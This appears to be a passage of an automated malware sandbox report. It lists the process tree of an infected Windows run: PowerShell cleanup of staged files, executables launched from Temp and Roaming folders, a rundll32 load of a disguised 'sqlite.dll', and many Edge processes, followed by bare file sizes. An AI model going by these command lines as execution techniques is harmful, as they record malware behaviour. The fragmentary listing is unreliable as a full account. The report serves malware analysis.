C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_8B74.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\6F09.exeC:\Users\Admin\AppData\Local\Temp\6F09.exe1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Users\Admin\AppData\Roaming\ebdhdbeC:\Users\Admin\AppData\Roaming\ebdhdbe1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files (x86)\Y-zlt0bm\IconCachectoh-6.exe"C:\Program Files (x86)\Y-zlt0bm\IconCachectoh-6.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\ebdhdbeC:\Users\Admin\AppData\Roaming\ebdhdbe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
456KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
43.0MB
-
Filesize
456KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
456KB
-
Filesize
43.1MB
-
Filesize
296KB
-
Filesize
164KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
80KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
1.3MB
-
Filesize
1.6MB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
1000KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
308KB
-
Filesize
6.0MB
-
Filesize
120KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
724KB
-
Filesize
728KB
-
Filesize
4KB
-
Filesize
372KB
-
Filesize
1.0MB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
68KB
-
Filesize
3.1MB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
456KB